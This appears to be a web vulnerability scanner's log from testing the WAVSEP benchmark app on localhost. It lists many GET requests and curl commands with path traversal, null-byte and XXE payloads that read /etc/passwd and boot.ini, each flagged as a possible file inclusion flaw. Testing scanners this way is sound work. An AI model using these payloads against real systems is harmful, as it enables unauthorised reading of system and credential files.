GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
